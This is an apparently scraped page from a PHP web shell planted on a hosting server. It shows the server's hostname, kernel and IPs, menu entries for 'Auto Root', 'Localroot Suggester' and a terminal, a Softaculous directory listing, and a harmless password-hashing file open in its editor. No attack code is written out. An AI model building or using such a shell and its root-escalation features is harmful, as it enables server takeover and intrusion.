Linux ams-business-8.hostwindsdns.com 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
LiteSpeed
Server IP : 192.236.177.161 & Your IP : 216.73.216.50
Domains :
Cant Read [ /etc/named.conf ]
User : ajzdfbpz
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
goffice67 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-02-12 11:14
php53
[ DIR ]
drwxr-xr-x
2026-02-12 11:14
php56
[ DIR ]
drwxr-xr-x
2026-02-12 11:14
php71
[ DIR ]
drwxr-xr-x
2026-02-12 11:14
php81
[ DIR ]
drwxr-xr-x
2026-02-12 11:14
php82
[ DIR ]
drwxr-xr-x
2026-02-12 11:14
.htaccess
537
B
-rw-r--r--
2023-12-13 08:20
NOTES.txt
1.61
KB
-rw-r--r--
2026-02-11 14:40
clone.php
6.26
KB
-rw-r--r--
2026-02-11 15:34
config.php
302
B
-rw-r--r--
2026-02-03 14:35
cookie_1.txt
131
B
-rw-r--r--
2026-02-03 14:35
edit.php
5.66
KB
-rw-r--r--
2026-02-11 15:34
edit.xml
433
B
-rw-r--r--
2023-12-13 08:20
extend.php
8.77
KB
-rw-r--r--
2026-02-11 15:34
fileindex.php
210
B
-rw-r--r--
2023-12-13 08:20
import.php
4.74
KB
-rw-r--r--
2026-02-11 15:34
info.xml
4.72
KB
-rw-r--r--
2026-02-11 14:40
install.js
924
B
-rw-r--r--
2023-12-13 08:20
install.php
7.48
KB
-rw-r--r--
2026-02-11 15:34
install.xml
850
B
-rw-r--r--
2026-02-03 14:35
md5
5.42
KB
-rw-r--r--
2026-02-11 15:34
update_pass.php
497
B
-rw-r--r--
2023-12-13 08:20
upgrade.php
5.46
KB
-rw-r--r--
2026-02-11 15:34
upgrade.xml
322
B
-rw-r--r--
2023-12-13 08:20
Save
Rename
<?php /** * A Compatibility library with PHP 5.5's simplified password hashing API. * * @author Anthony Ferrara <ircmaxell@php.net> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @copyright 2012 The Authors */ @unlink('update_pass.php'); if(!defined('PASSWORD_BCRYPT')){ define('PASSWORD_BCRYPT', 1); } define('PASSWORD_DEFAULT', PASSWORD_BCRYPT); $resp = password_hash('[[admin_pass]]', PASSWORD_DEFAULT); echo '<update_pass>'.$resp.'</update_pass>'; ?>